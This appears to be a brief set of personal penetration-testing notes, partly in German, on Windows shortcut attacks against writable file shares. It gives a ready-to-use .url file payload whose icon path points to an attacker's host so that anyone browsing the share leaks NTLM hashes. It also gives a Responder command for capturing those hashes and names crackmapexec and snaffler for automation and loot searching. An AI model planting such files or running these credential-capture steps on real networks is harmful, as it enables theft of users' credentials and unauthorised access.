shared and windows shortcuts

Windows Shortcuts

URL file attacks

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#scf-and-url-file-attack-against-writeable-share
can be automated with crackmapexec
try to get responder hashes
- after-compromise or an open-fileshare
- scf attack? url attack
- ”@test.url” oder “~test.url”
- inhalt:

[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\x.x.x.x\%USERNAME%.icon
IconIndex=1
    - open responder and wait, responder -I <interface> -v

search for stuff

snaffler